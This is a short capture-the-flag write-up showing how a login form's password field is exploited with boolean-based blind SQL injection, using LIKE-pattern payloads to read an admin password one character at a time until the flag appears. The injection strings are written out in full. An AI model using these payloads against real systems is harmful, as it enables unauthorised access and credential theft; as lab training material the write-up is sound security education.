This one was really rewarding.

Challenge: The website isn’t really me much, but you can still get the admin password, right?

Hint: Sometimes an error message can be just as useful



So, the landing page looked like this:

landing

Based on the description we know the username is admin so let’s focus on the password field.

Entering a single quote results in an error, great, there is a problem with the query, we know the syntax and it appears to be injectable.

sqlerror

Injectables

' and 1=1-- results in an Incorrect Password.

' or 1=1-- results in an interesting message:

login

We were stuck here for a bit, but then one night got an idea based on these 2 pieces of information:

  1. We’re specifically looking for the Admin password
  2. We know the query for the password field, so let’s ask it specific questions about the password

The query we used moving forward was: ' or pass LIKE "%"-- which also gave the interesting message Login Functionality Not Complete. Flag is 63 characters

Note the use of the LIKE operator

Does the password start with…?
' or pass LIKE "a%"-- : Incorrect Password.
' or pass LIKE "b%"-- : Incorrect Password.


' or pass LIKE "n%"-- : Login Functionality Not Complete. Flag is 63 characters
' or pass LIKE "o%"-- : Incorrect Password.

Alright, now we’re getting somewhere. The first letter of the password is n

A bit of Go code, found on github, and a few POST requests later, 1,215 to be exact:

scripting

…and our flag is: not_all_errors_should_be_shown_fb83c582ee9b64d1f446cfd01702e7c5